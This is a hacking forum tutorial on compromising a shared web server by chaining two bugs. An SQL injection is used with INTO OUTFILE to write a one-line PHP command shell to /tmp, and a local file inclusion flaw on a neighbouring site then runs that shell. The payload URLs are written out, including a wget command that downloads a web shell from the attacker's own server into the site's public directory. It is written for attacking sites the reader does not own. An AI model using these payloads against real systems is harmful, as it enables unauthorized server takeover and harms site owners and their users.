Okay so I’m about to explain a very nifty and important way to own a server that your targeting. This is something most young hackers never think of doing but can be very handy when a server is hosting multiple sites. Lets say you target a server, you do a reverse IP lookup to see how many sites are hosted. The more sites, the better your chances of getting into the server. So the server ends up having 5 sites on it. After looking around for vulnerabilities on all 5 sites you find 1 site is vuln to SQLI and another is vuln to LFI.[0x02] The Attack:
Okay so of course most hackers will take the SQLi to gain the admin credentials and try to log in because its faster than LFI sometimes if /proc/self/environ isnt present on the LFI vulnerable site. So we do everything write but when we try to log in the credentials that we extracted from the DB was outdated and misleading. So now what? Give up? NOOOOOO!
[0x03] Attack 1:
So if we have the right privileges in the SQLi with our current user we could possibly write files to the server through the SQLi. So we are going to add a file to a write able directory, usually the “temp” directory is write able so we are going to write a one line shell that will let us run commands over the server. Just like a php shell but smaller and used through the url with no interface.
http://www.sqlivuln.com/index.php?ID=-1 union select '<?system($_GET[cmd])?>',2,3,4,5 into outfile "/tmp/cmd.txt"--
* Here we just use the into outfile to write cmd.txt which is our shell to the tmp directory which is write able. Just your normal sqli, 5 columns, 1st column is used to retrieve data just like you would when getting your version() and just adding into outfile “/tmp/cmd.txt” to the end of your syntax. Now our shell is created and we use the $cmd variable to $GET our commands. Will explain in next attack.
[0x04] Attack 2:
Now that we have our file on the server lets go back to our LFI vuln site on the same server and read cmd.txt and try to execute a command and hopefully get a shell up. This step is easy.
[*] Typical LFI Vuln:
[*] Reading CMD.txt by leveraging LFI vuln:
[*] Running command on CMD.txt by leveraging LFI vuln:
http://www.lfivuln.com/index.php?file=../tmp/cmd.txt&cmd=wget http://email@example.com/myshell.txt -O /full-path-of-site/public_html/shell.php
(This will execute the $cmd variable in cmd.txt to run the wget command which will download a text file from my server, which is just a php shell with the .txt extension and the -O /full-path-of-site/public_html/shell.php command will rename the file to shell.php and of course you must find the full path of the server so that you can download your shell to a directory that we can open our shell up through the browser. “Hosting Directory in short terms”)
[*] Opening shell.
(I uploaded the shell using the lfi vuln site so the shell clearly is going to be hosted in the root directory or “hosting directory” of the lfi vuln site where I saved it.)
Hope you guys enjoyed my thread, also I’m not perfect, if I made mistakes or anything in the Tutorial please let me know and Ill edit the thread. Or if you have anything to add to the thread that could better it, please share. Wouldn’t mind learning something new
- Admin CP Finder [Perl]
- US Military Academies using Ubuntu for Training Future Officers in Cyber Warfare